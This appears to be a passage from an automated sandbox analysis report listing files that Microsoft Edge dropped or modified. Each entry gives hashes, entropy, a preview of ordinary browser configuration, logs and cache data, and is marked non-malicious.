                                                                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1Z.].q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13379154140512879..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):317
                                                                                                                                                                                                                                                                              Entropy (8bit):5.120781249137323
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:17.110 2028 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/20-02:42:17.173 2028 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                              Size (bytes):358860
                                                                                                                                                                                                                                                                              Entropy (8bit):5.324615422681383
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rj:C1gAg1zfvb
                                                                                                                                                                                                                                                                              MD5:8C626AFEF59CEEDFFFA6F37E7BFDDB03
                                                                                                                                                                                                                                                                              SHA1:A94A89830BDFA2EBF3076958DE62C6D23DD9A630
                                                                                                                                                                                                                                                                              SHA-256:3F4AAF35BB99808299C2FA55B13DD9964A2FE81626A38509876383CEA983A388
                                                                                                                                                                                                                                                                              SHA-512:90B1B44F88EF043871098088A2DA029553E1B8E5FC8DD3970B81815ECBC869499F7D544C07775C430110350F06437D0A3B576AE3AA441B1CE3CA32B7E2EE937F
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):418
                                                                                                                                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                              MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                              SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                              SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                              SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):327
                                                                                                                                                                                                                                                                              Entropy (8bit):5.121077658376117
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfxnrQyq2PcNwi23oH+Tcwt8aPrqIFUt8IXfxnrG1Zmw+IXfxFc1RkwOcNwi230:RrQyvLZYebL3FUt86rg/+6Fc1R54ZYeo
                                                                                                                                                                                                                                                                              MD5:8CD6E7522D8E843316F11652BFDBF5C9
                                                                                                                                                                                                                                                                              SHA1:DF6DF79772BA69B8B9410E6D913BB028306B33C7
                                                                                                                                                                                                                                                                              SHA-256:0740B118CD56F832A3FC8C998EA8092AAD438CF04127002BFDB12B49597D1073
                                                                                                                                                                                                                                                                              SHA-512:5F22AA0064382D49442EF5CBBE6B3ACA3F7C46F065366D7314942648272093FA2C91FC111AC964A085DCC077D0037C1AA5ECFE2EED0A416ADECA030AF6C2C079
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:12.739 490 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/20-02:42:12.739 490 Recovering log #3.2024/12/20-02:42:12.740 490 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):331
                                                                                                                                                                                                                                                                              Entropy (8bit):5.163420189917638
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfxfreVq2PcNwi23oH+Tcwt865IFUt8IXfxfregZmw+IXfxfreIkwOcNwi23oHY:RjeVvLZYeb/WFUt86jeg/+6jeI54ZYev
                                                                                                                                                                                                                                                                              MD5:007B7520BF5041043118B2F2B2C72A9C
                                                                                                                                                                                                                                                                              SHA1:7E68AE232D4E8CEFD51B29032900E98CA462ABAD
                                                                                                                                                                                                                                                                              SHA-256:FF81C054A11FC9451C6CDDA1062A66FC731EB5C95C578A7A5B73AFD614F5888F
                                                                                                                                                                                                                                                                              SHA-512:7FE5C8F7DE2978B7DEB219936AF3936716E67E9AB1AC8807F9CCAA753FB38563D0414B75727A2F8EDC718E3468A0B787ABD4C2A33ADAC3330A540C1F08F08CB1
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:12.775 484 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/20-02:42:12.775 484 Recovering log #3.2024/12/20-02:42:12.775 484 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1254
                                                                                                                                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                              MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                              SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                              SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                              SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):330
                                                                                                                                                                                                                                                                              Entropy (8bit):5.164423642968304
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfx7Vq2PcNwi23oH+Tcwt8NIFUt8IXfx7gZmw+IXfx7IkwOcNwi23oH+Tcwt8+Q:R7VvLZYebpFUt867g/+67I54ZYebqJ
                                                                                                                                                                                                                                                                              MD5:08798EC23147ED173472BC26212B6004
                                                                                                                                                                                                                                                                              SHA1:E7A19C8DD1B67ABC29C5868B3721578B1DCD8DA6
                                                                                                                                                                                                                                                                              SHA-256:5D6689C06012661510B9484510769EC87B8415169C207340D31AF7EB165F2291
                                                                                                                                                                                                                                                                              SHA-512:8903CFA60F70408CF89611C8F983B64ABEFB37F4EEA9E22E3819F1599BC805E2E6FCE9C281EF0FEDB5D009572080C9A7B23EB513BCBD8765F3CB28D58F5B7F6D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:13.438 1674 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/20-02:42:13.438 1674 Recovering log #3.2024/12/20-02:42:13.438 1674 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):429
                                                                                                                                                                                                                                                                              Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                              MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                              SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                              SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                              SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):8720
                                                                                                                                                                                                                                                                              Entropy (8bit):0.2191763562065486
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:K9hRtFlljq7A/mhWJFuQ3yy7IOWUKrhudweytllrE9SFcTp4AGbNCV9RUIBn:KTK75fO0hud0Xi99pEY/
                                                                                                                                                                                                                                                                              MD5:6FFCB8B81DA9524C8883489572DA4DDF
                                                                                                                                                                                                                                                                              SHA1:7DA62525AABFAD708544791D2FC86DC128C0CCAC
                                                                                                                                                                                                                                                                              SHA-256:202582DC7C2527B350F608CDE8EC371734D284D4BB87024B78F8ED96CD9BA9A3
                                                                                                                                                                                                                                                                              SHA-512:24B464F7EAA3FF6FBE7644D0F0E8DE9CF3C27247194107164E71416D6F7F8B28BCC18A0D97B66F1B2392AFC8E4AAC7F1FF31535481B9A1B5D5E60ED146AC53FE
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):115717
                                                                                                                                                                                                                                                                              Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                              MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                              SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                              SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                              SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                                                                                                              Entropy (8bit):3.648111512782986
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:aj9P0IJP/KbtRcoQkQerWjlfgam6IThj773pLLRKToaAu:ad1P/7oe2slejF7NRKcC
                                                                                                                                                                                                                                                                              MD5:8F653A338E5F799873BAF466EC18F473
                                                                                                                                                                                                                                                                              SHA1:CB972A1515232961D4866D2BD6996EA8745DEEDB
                                                                                                                                                                                                                                                                              SHA-256:2BF9654A33098743049460EF4C8F91F11C11C2BB9F7BAA357352DBBA6AB6CECD
                                                                                                                                                                                                                                                                              SHA-512:3D28899BD4EEED190F54320DBA5413DED6755C0BE294F02C76FE5FB55AB69E9BB46CE1FA9FDA98A63C5F2471A1EABFCD3FE5462B6A293D7B722D2AB7A99F9F19
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):414
                                                                                                                                                                                                                                                                              Entropy (8bit):5.299057700961188
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:RL/VvLZYeb8rcHEZrELFUt86Lsg/+6L/iSI54ZYeb8rcHEZrEZSJ:Z/5lYeb8nZrExg8Csk/lSoYeb8nZrEZe
                                                                                                                                                                                                                                                                              MD5:896047FFD4D85E647740FBEFE32244D5
                                                                                                                                                                                                                                                                              SHA1:DF02C13FB04BBE74C3D83CEF9E5F5E1BCCF713B0
                                                                                                                                                                                                                                                                              SHA-256:E3DC85BDC90B771683EB8BFB52757D9E00EEF38831EA3EDA50D4DD584FD86488
                                                                                                                                                                                                                                                                              SHA-512:0137FA15A348FEF3054974DB9336A0009F6BC7425C27179445C1C6307D87A178BC4F18E293BDFDE3E773BCD88AD3060CE86CD61932BB015A055CDD8987CA046F
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:16.985 1674 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/20-02:42:16.986 1674 Recovering log #3.2024/12/20-02:42:16.987 1674 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1660
                                                                                                                                                                                                                                                                              Entropy (8bit):5.645980676935876
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:4StZxTJ1v+XZ0bV03Sx4Lyls5BiyUL7AHHk2GJ341:4StrV1vEaD2osNdP1
                                                                                                                                                                                                                                                                              MD5:D55A89E1CBD24B7E5E39BB9A2B2E7DFC
                                                                                                                                                                                                                                                                              SHA1:52D053DA347EFF9D535DEF555A2FE3DE2E2AFFF5
                                                                                                                                                                                                                                                                              SHA-256:42AF659A7E0889D5F34D97343657AB989BCC78B9B76EBEEDAF42821373CDA7D7
                                                                                                                                                                                                                                                                              SHA-512:1CD1BD21BB8CF3CA802EF160B0F0CD31310CF2160195B691AB46D59D2C8CBA4A20797CA6C0735FE83C795D78DE7B7A83073DD2D9A340E3F590AB7790B681873D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:...^9................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":754}.!_https://ntp.msn.com..LastKnownPV..1734680546970.-_https://ntp.msn.com..LastVisuallyReadyMarker..1734680547971.._https://ntp.msn.com..MUID!.2FB26BEE4D14683625707EB54C6669DF.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1734680547038,"schedule":[-1,30,-1,12,-1,25,-1],"scheduleFixed":[-1,30,-1,12,-1,25,-1],"simpleSchedule":[21,25,19,49,23,24,14]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1734680546942.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241219.380"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_htt
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):342
                                                                                                                                                                                                                                                                              Entropy (8bit):5.100952342317442
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfxC3cM+q2PcNwi23oH+Tcwt8a2jMGIFUt8IXfx/JZmw+IXfxJcMVkwOcNwi234:RC3cM+vLZYeb8EFUt86/J/+6JcMV54Zo
                                                                                                                                                                                                                                                                              MD5:CC2504E0B54381C2D6F75AA47B3B71FE
                                                                                                                                                                                                                                                                              SHA1:3605FCD41AABA735CD56CC89501A5E23FAAE43F8
                                                                                                                                                                                                                                                                              SHA-256:05A8F2D5C870ECF303D0A9DD072F32C48A979BF0C09097224946A30BCB6EEBA4
                                                                                                                                                                                                                                                                              SHA-512:41079B23ADE4A9562FEEDBB9334350E27C9219B914612D5965D5F754FFB4C6997BB1212BD717AE9E958F6489D5E551486D3D684DE838C7F1BA83E8E517AE442E
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:13.030 1f8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/20-02:42:13.031 1f8c Recovering log #3.2024/12/20-02:42:13.033 1f8c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1618
                                                                                                                                                                                                                                                                              Entropy (8bit):5.302994819295006
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:YcCpWsduCvsafc7leeBRsygCgkhYhbyD0:F2vu22keBxukOhn
                                                                                                                                                                                                                                                                              MD5:90B46E2386024DB7264E402160E5F3B4
                                                                                                                                                                                                                                                                              SHA1:3B2E2F784405DFE32CFE038FAF9F0121224877BB
                                                                                                                                                                                                                                                                              SHA-256:C56B810798569D26A6B771B8DED39C12F26FAC419F019BC878C6B001FBFA501D
                                                                                                                                                                                                                                                                              SHA-512:FA97B24F01A6378FA4A2B3875E9694AC90F0C469E14675FE657DB2F6728C9C9A5D665766F97FE72F533AA89E38C0F0B700C364B85C75867AB6F0083EDD05B186
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                              Size (bytes):1768
                                                                                                                                                                                                                                                                              Entropy (8bit):5.299647170768524
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:YcCpfgCzs6tsGTfcKsrleeBkBRsqFCgHLYhbyD0:F2ftTTUkeBkBHTMhn
                                                                                                                                                                                                                                                                              MD5:BAEB1C84F0B40F595253E9524090D8BE
                                                                                                                                                                                                                                                                              SHA1:B2526F7FDF0B0045B4155707B698A2D316421C6A
                                                                                                                                                                                                                                                                              SHA-256:E2CBBD4F5E269436EE97165A8A936DA12823A6BBCB30F525B5F320AEDB6529AC
                                                                                                                                                                                                                                                                              SHA-512:3AB0BBC8C21592B3728F945BA887BA17FBF49746F0A1D0877510AD32A9237C556135D73E218D418FA7D1F7A8F44268A6D36ECB694FC7A9F231AB48BF3F19D69E
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381746136401901","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381746141175431","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379247743871144","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA="
